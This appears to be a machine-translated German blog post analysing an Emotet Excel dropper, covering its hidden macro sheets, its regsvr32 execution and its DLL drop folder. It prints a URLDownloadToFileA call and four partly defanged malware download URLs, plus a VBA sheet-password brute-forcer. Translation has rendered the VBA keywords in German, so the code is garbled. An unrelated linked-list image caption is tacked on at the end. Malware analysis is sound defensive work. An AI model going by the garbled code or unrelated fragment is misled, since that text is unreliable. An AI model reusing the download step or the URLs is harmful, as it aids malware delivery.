Emotet-Kampagne:
Von Ilan Duhin und Yossi Poberezsky( @pober58 )
Zusammenfassung:
In den letzten Monaten gab es in Europa eine umfangreiche Kampagne, insbesondere gegen Schadsoftware mit dem Namen „Emotet“. Die Malware kommt als Excel-Datei an und versucht, mit einer Reihe von URLs zu kommunizieren und am Ende vier DLL-Dateien auf den Computer herunterzuladen.
Emotet verwendet einen API-Aufruf von CreateDirectoryA, um einen Ordner zu erstellen, in dem die Dateien lokal auf dem Computer gespeichert und von dort über Regsvr32.exe ausgeführt werden.
Statische Analyse:
OLE-Tools:
Überprüfung der Dateistruktur.
Einen Hinweis darauf bekommen, dass wir uns in den Excel-6-Blättern befinden.
Überprüfen Sie die Funktionen der Datei mithilfe von malwoverview.py und erhalten Sie einige Hinweise.
Gehen Sie in den dritten Strom hinein und ziehen Sie seine Fäden heraus.
Finden Sie 4 verdächtige URLs.
Die Datei enthält ein Makro. Suchen Sie außerdem alle Zellen, die den gesamten Code enthalten.
Dynamische Analyse:
Zuerst haben wir versucht, Excel (Teil von Office 2021) zu öffnen. Dabei stellen wir fest, dass es ohne geöffnet wurde
Popup-Fenster „Inhalt aktivieren“. Nach wenigen Recherchen zeigt die Meldung nur die Office-Versionen 2007–2013. Danach blockiert Microsoft die Möglichkeit, die Ausführung von Makros automatisch zu ermöglichen.
Um Makros zu aktivieren, müssen wir die Option wie im Bild unten ändern:
** In Office 2007/2013 wird es durch Klicken auf „Inhalt aktivieren“ ausgeführt.
Sie müssen es speichern und erneut in eine Excel-Datei eingeben.
Und nun…
Wenn wir auf die Schaltfläche drücken, werden vier Meldungen angezeigt.
Wenn Sie auf regsvr32.exe klicken, können Sie die Makros sehen, die es zum Ausführen der Malware verwenden. Es verhält sich wie ein Dropper, da es einen Ordner generiert, um seine DLL dort abzulegen.
Wenn wir Excel öffnen und die statische Untersuchung verfolgen, sehen wir 6 Blätter, die vor dem Opfer verborgen waren.
Für jedes Blatt ist ein Passwort erforderlich.
Um das Passwort zu extrahieren, verwenden wir „Passwortbrecher für VBA“.
Quelle:https://www.instructables.com/VBA-Code-To-Unlock-A-Locked-Excel-Sheet/
Sub PasswordBreaker()
„Bricht den Passwortschutz für Arbeitsblätter auf.“
Dim i als Ganzzahl, j als Ganzzahl, k als Ganzzahl
Dim l als Ganzzahl, m als Ganzzahl, n als Ganzzahl
Dimmen Sie i1 als Ganzzahl, i2 als Ganzzahl, i3 als Ganzzahl
Dimmen Sie i4 als Ganzzahl, i5 als Ganzzahl, i6 als Ganzzahl
Bei Fehler Weiter fortsetzen
Für i = 65 bis 66: Für j = 65 bis 66: Für k = 65 bis 66
Für l = 65 bis 66: Für m = 65 bis 66: Für i1 = 65 bis 66
Für i2 = 65 bis 66: Für i3 = 65 bis 66: Für i4 = 65 bis 66
Für i5 = 65 bis 66: Für i6 = 65 bis 66: für n = 32 bis 126
ActiveSheet.Unprotect Chr(i) & Chr(j) & Chr(k) & _
Chr(l) & Chr(m) & Chr(i1) & Chr(i2) & Chr(i3) & _
Chr(i4) & Chr(i5) & Chr(i6) & Chr(n)
Wenn ActiveSheet.ProtectContents = False, dann
MsgBox „Ein verwendbares Passwort ist „ & Chr(i) & Chr(j) & _
Chr(k) & Chr(l) & Chr(m) & Chr(i1) & Chr(i2) & _
Chr(i3) & Chr(i4) & Chr(i5) & Chr(i6) & Chr(n)
Sub verlassen
Ende wenn
Weiter: Weiter: Weiter: Weiter: Weiter: Weiter
Weiter: Weiter: Weiter: Weiter: Weiter: Weiter
End Sub
Um unseren VBA-Code einzufügen, müssen wir ALT+F11 drücken, ihn einfügen und ausführen.
Fügen Sie den Passwortbrecher in jedes Blatt ein.
Excel zeigt uns automatisch das Passwort für das angeforderte Blatt an.
Wir können es überprüfen, indem wir mit der rechten Maustaste klicken und sehen, dass das Blatt „Geschützt“ ist.
Datenblatt 1:
Datenblatt 2:
Wenn wir die Zeichenfolgen neu organisieren, sehen wir vier URLs:
- URLDownloadToFileA“, „JCCB“, 0, „https://audioselec.c[o]m/about/dDw5ggtyMojggTqhc
-https://geringer-muehle.[de]/wp-admin/G/
-http://intolove.co.[uk]/wp-admin/FbGhiWtrEzrQ/
-http://isc.net.[ua]/themes/3rU/
Datenblatt 3:
Datenblatt 4:
Noch zwei weitere URLs, die wir zuvor gesehen haben.
Datenblatt 5:
Datenblatt 6:
Enthält die Anweisungen zum Zusammenfassen der Zeichenfolgen.
DLL-Analyse:
Exportfunktion Nummer 18.
Nachdem wir die DLL durchgesehen hatten, fanden wir ein paar interessante Zeichenfolgen im Speicher-Tab.
Darüber hinaus springt es bei der Ausführung zum nächsten Pfad:
Bei der Analyse des Speicherstrings der DLL in VT erhielten wir eine Beschreibung von Emotet.
Schlussfolgerungen:
· Die Makros dienen dazu, die Emotet-Malware herunterzuladen und auszuführen.
· Die Excel-Datei verwendet Makros, um auf Web-URLs zuzugreifen.
· Über regsvr32.exe führt Emotet seine Ausführung durch.
· Der Emotet-Dropper wird als DLL-Datei in einen zufällig generierten Ordner unter %UserProfile%\Appdata\Local heruntergeladen.

![Was ist überhaupt eine verknüpfte Liste? [Teil 1]](https://post.nghiatu.com/assets/images/m/max/724/1*Xokk6XOjWyIGCBujkJsCzQ.jpeg)



































